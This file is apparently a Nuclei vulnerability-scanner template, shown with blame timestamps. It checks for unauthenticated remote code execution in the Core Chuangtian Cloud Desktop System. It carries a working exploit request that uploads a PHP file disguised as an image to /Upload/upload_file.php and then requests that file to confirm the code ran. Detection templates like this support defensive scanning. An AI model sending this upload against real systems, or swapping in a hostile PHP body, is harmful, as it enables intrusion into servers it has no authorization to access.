nuclei-templates/http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml

47 lines
1.5 KiB
YAML
Raw Normal View History

2021-04-13 06:53:27 +00:00
id: core-chuangtian-cloud-rce
info:
name: Core Chuangtian Cloud Desktop System - Remote Code Execution
2021-04-13 06:53:27 +00:00
author: pikpikcu
severity: critical
description: Core Chuangtian Cloud Desktop System is susceptible to remote code execution vulnerabilities.
reference:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 2
2023-10-14 11:27:55 +00:00
tags: rce,fileupload,intrusive,cloud,chuangtian
2024-04-15 11:26:37 +00:00
variables:
string: "core-chuangtian-cloud-rce"
2021-04-13 06:53:27 +00:00
http:
2021-04-13 06:53:27 +00:00
- raw:
- |
POST /Upload/upload_file.php?l=test HTTP/1.1
Host: {{Hostname}}
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
------WebKitFormBoundaryfcKRltGv
2022-11-02 13:24:27 +00:00
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
2021-04-13 06:53:27 +00:00
Content-Type: image/avif
2024-04-15 11:26:37 +00:00
<?php echo md5("{{string}}");unlink(__FILE__);?>
2021-04-13 06:53:27 +00:00
------WebKitFormBoundaryfcKRltGv--
- |
2022-11-02 13:24:27 +00:00
GET /Upload/test/{{randstr}}.php HTTP/1.1
2021-04-13 06:53:27 +00:00
Host: {{Hostname}}
matchers:
2024-04-15 11:26:37 +00:00
- type: word
part: body_2
words:
- '{{md5(string)}}'
# digest: 4a0a00473045022066f84a24609e8aff18468dae4751d89b3367da8fbc9482995f7e6a21e3ae3795022100d4a6ce892231c551e62bdf99206ef5fad32891d92eea97c3d5bfd5ff5afc21eb:922c64590222798bb761d5b6d8e72950